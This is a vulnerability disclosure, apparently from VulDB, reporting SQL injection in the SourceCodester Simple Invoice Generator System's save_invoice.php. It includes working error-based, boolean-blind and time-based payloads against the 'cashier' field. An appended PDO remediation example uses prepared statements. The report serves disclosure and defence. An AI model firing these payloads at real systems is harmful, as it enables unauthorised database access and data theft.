Submit #403629: SourceCodester Simple Invoice Generator System 1.0 SQL Injection

Info

Title: SourceCodester Simple Invoice Generator System 1.0 SQL Injection
Description:

I would like to report a SQL injection vulnerability I discovered in the SourceCodester Simple Invoice Generator System during my testing.

Details:
Affected URL/Endpoint: /php-invoice/save_invoice.php
Vulnerable Parameters: 'invoice_code', 'customer', 'cashier', 'total_amount', 'discount_percentage', 'discount_amount', 'tendered_amount'
Risk Level: High (allows malicious users to execute arbitrary SQL queries)

Steps to reproduce:
1) Sign in as any cashier.
2) Fill out the form and click "Add Item".
3) Click "Save & Generate Printable Invoice".
4) Use a proxy like Burp Suite to intercept the "save_invoice" request.
5) Input the payload to invoke the SQL injection.

---
cashier=Cashier+1%27+OR+GTID_SUBSET%28CONCAT%280x717a716a71%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29+AS+NCHAR%29%2C0x20%29%29%2C1%2C190%29%29%2C0x7162786a71%29%2C8744%29--+BhDR&total_amount=12&discount_amount=0&invoice_code=test&customer=test&qty%5B%5D=1&item%5B%5D=test&unit%5B%5D=pcs&price%5B%5D=12&total%5B%5D=12&discount_percentage=0&tendered_amount=0
---

6) It is also vulnerable to the following attacks, as found by running sqlmap on it.

---
Parameter: cashier (POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: cashier=Cashier 1' AND EXTRACTVALUE(9612,CASE WHEN (9612=9612) THEN 9612 ELSE 0x3A END)-- rTeI&total_amount=12&discount_amount=0&invoice_code=test&customer=test&qty[]=1&item[]=test&unit[]=pcs&price[]=12&total[]=12&discount_percentage=0&tendered_amount=0

    Type: error-based
    Title: MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)
    Payload: cashier=Cashier 1' OR GTID_SUBSET(CONCAT(0x717a716a71,(SELECT (ELT(6679=6679,1))),0x7162786a71),6679)-- laEK&total_amount=12&discount_amount=0&invoice_code=test&customer=test&qty[]=1&item[]=test&unit[]=pcs&price[]=12&total[]=12&discount_percentage=0&tendered_amount=0

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: cashier=Cashier 1' OR (SELECT 7314 FROM (SELECT(SLEEP(5)))EMDB)-- ndpB&total_amount=12&discount_amount=0&invoice_code=test&customer=test&qty[]=1&item[]=test&unit[]=pcs&price[]=12&total[]=12&discount_percentage=0&tendered_amount=0
---

Please let me know if you need further information or a more detailed analysis.
Source:
User: Delvy (UID 74555)
Submission: 09/06/2024 10:49
Moderation: 09/06/2024 23:32 (13 hours later)
Status: Accepted
VulDB Entry: 276780 [SourceCodester Simple Invoice Generator System 1.0 /save_invoice.php SQL Injection]
Points: 17
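The report shows the seven POST fields of save_invoice.php being spliced into SQL, with the error-based variant relying on database errors reaching the response. The following is an added remediation example, not the project's code: a PDO handler that binds those fields as parameters, validates the numeric ones, and keeps database errors out of the response. The table name, column names and connection details are assumptions.

```php
<?php
// Added example (not the project's code): hardened handler for the fields of
// /php-invoice/save_invoice.php named in the report. Prepared statements keep
// the posted values as data, so a quote in 'cashier' cannot close the literal.
// Table 'invoices', its columns and the DSN/credentials are assumptions.

function save_invoice(PDO $pdo, array $post): int
{
    $invoice_code = (string)($post['invoice_code'] ?? '');
    $customer     = (string)($post['customer'] ?? '');
    $cashier      = (string)($post['cashier'] ?? '');

    // Amount fields: accept only plain decimals before they reach the query.
    $numeric = [];
    foreach (['total_amount', 'discount_percentage', 'discount_amount', 'tendered_amount'] as $f) {
        $v = $post[$f] ?? '';
        if (!is_numeric($v)) {
            throw new InvalidArgumentException("Field $f must be numeric");
        }
        $numeric[$f] = (float)$v;
    }

    $stmt = $pdo->prepare(
        'INSERT INTO invoices (invoice_code, customer, cashier, total_amount,
            discount_percentage, discount_amount, tendered_amount)
         VALUES (:code, :customer, :cashier, :total, :disc_pct, :disc_amt, :tendered)'
    );
    $stmt->execute([
        ':code'     => $invoice_code,
        ':customer' => $customer,
        ':cashier'  => $cashier,          // stored verbatim, never executed
        ':total'    => $numeric['total_amount'],
        ':disc_pct' => $numeric['discount_percentage'],
        ':disc_amt' => $numeric['discount_amount'],
        ':tendered' => $numeric['tendered_amount'],
    ]);
    return (int)$pdo->lastInsertId();
}

try {
    // Server-side prepares (no emulation) and exceptions instead of silent failure.
    $pdo = new PDO('mysql:host=localhost;dbname=invoice_db', 'db_user', 'db_pass', [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,
    ]);
    echo json_encode(['status' => 'ok', 'id' => save_invoice($pdo, $_POST)]);
} catch (PDOException $e) {
    // Log the detail server-side; a generic message denies the error-based
    // technique the verbose MySQL error text it depends on.
    error_log('save_invoice failed: ' . $e->getMessage());
    http_response_code(500);
    echo json_encode(['status' => 'error', 'message' => 'Could not save invoice']);
}
```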
